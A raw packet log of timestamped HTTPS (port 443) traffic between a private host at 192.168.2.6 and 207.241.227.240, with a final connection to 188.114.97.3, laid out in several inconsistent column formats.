Sep 26, 2024 10:58:05.597706079 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.597774982 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.597785950 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.597839117 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.598655939 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.598673105 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.598736048 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.598743916 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.598803997 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.598849058 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.599361897 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.599378109 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.599416018 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.599423885 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.599446058 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.599462986 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.599896908 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.599915028 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:05.599963903 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:05.599978924 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
                                      Sep 26, 2024 10:58:05.600022078 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.600780010 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.600795984 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.600841999 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.600855112 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.600897074 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.619997978 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.620027065 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.620116949 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.620134115 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.620186090 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.650044918 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.650078058 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.650204897 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.650275946 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.650371075 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.668983936 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.669002056 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.669203043 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.669231892 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.669286966 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.685225964 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.685245037 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.685338020 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.685404062 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.685458899 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.686058044 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686074972 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686129093 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.686137915 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686180115 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.686681032 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686697960 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686754942 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.686760902 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.686806917 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687202930 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687220097 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687253952 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687261105 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687289000 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687308073 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687746048 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687763929 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687825918 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687825918 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.687834978 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.687874079 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.707724094 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.707755089 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.707835913 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.707847118 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.707889080 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.746386051 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.746409893 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.746547937 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.746572971 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.746644974 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.756546021 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.756567001 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.756700993 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.756716967 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.756761074 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.772582054 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.772598028 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.772682905 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.772694111 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.772744894 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.773536921 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.773551941 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.773611069 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.773617983 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.773658991 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.774127960 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774147987 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774195910 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.774204016 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774246931 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.774817944 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774835110 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774887085 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.774894953 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.774950027 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.775353909 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.775369883 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.775422096 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.775429964 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.775468111 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.795222044 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.795238972 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.795305967 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.795341015 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.795388937 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.833803892 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.833820105 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.833930969 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.833972931 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.834018946 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.843955040 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.843970060 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.844043016 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.844080925 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.844099998 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.844136953 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.860080957 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.860097885 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.860333920 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.860378981 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.860430002 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.861063004 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861078978 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861154079 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.861174107 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861233950 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.861588955 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861604929 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861656904 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.861670017 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.861704111 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.862349033 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862365007 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862431049 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.862453938 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862498999 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.862834930 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862850904 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862893105 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.862903118 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.862940073 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.882769108 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.882800102 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.882893085 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.882939100 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.882988930 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.921588898 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.921623945 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.921778917 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.921832085 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.921885967 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.931392908 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.931416988 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.931493044 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.931534052 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.931591034 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.947484970 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.947503090 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.947599888 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.947635889 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.947678089 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.948437929 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.948461056 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.948517084 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.948525906 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.948570013 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.949037075 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949054956 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949107885 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.949115992 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949151993 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.949836016 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949851036 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949899912 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.949911118 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.949958086 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.950251102 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.950267076 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.950313091 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.950320959 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.950355053 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.970144033 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.970168114 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.970247984 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:05.970288992 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:05.970334053 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.009068012 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.009085894 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.009200096 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.009239912 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.009287119 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.018971920 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.018986940 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.019073009 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.019104958 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.019157887 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.035137892 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.035155058 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.035332918 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.035368919 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.035439014 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036017895 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036040068 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036098003 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036106110 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036150932 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036725044 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036741972 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036786079 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036792040 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.036824942 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.036850929 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037239075 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037255049 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037305117 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037312031 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037338972 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037364960 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037833929 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037851095 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037906885 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.037914038 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.037959099 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.057864904 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.057893038 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.058059931 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.058085918 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.058131933 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106023073 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106053114 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106148958 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106183052 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106229067 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106540918 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106559038 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106590986 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106606007 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.106630087 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.106652021 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.122528076 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.122545004 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.122627020 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.122657061 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.122699022 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.123789072 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.123806000 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.123859882 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.123868942 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.123912096 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.124403954 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124422073 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124469042 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.124476910 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124517918 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.124888897 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124906063 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124952078 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.124959946 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.124998093 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.125560999 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.125577927 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.125627995 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.125633955 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.125674963 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.145646095 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.145677090 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:06.145750999 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:06.145775080 CEST44349711207.241.227.240192.168.2.6
Sep 26, 2024 10:58:06.145832062 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.193569899 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.193602085 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.193711996 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.193737030 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.193790913 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.194001913 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.194021940 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.194072008 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.194078922 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.194118977 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.210258007 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.210290909 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.210355043 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.210375071 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.210413933 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.211195946 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.211280107 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.211316109 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.211323977 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.211352110 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.211374998 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.211877108 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.211905956 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.211945057 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.211951971 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.211987972 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.212011099 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.212387085 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.212410927 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.212441921 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.212446928 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.212476015 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.212500095 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.213013887 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.213042974 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.213083982 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.213090897 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.213118076 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.213140965 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.233221054 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.233254910 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.233320951 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.233329058 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.233340979 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.233370066 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.281440020 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.281474113 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.281517029 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.281591892 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.281599998 CEST  443  49711  207.241.227.240  192.168.2.6
Sep 26, 2024 10:58:06.281627893 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.281651020 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.284284115 CEST  49711  443  192.168.2.6  207.241.227.240
Sep 26, 2024 10:58:06.379568100 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:06.379704952 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:06.379909039 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:06.380397081 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:06.380429029 CEST  443  49712  188.114.97.3  192.168.2.6
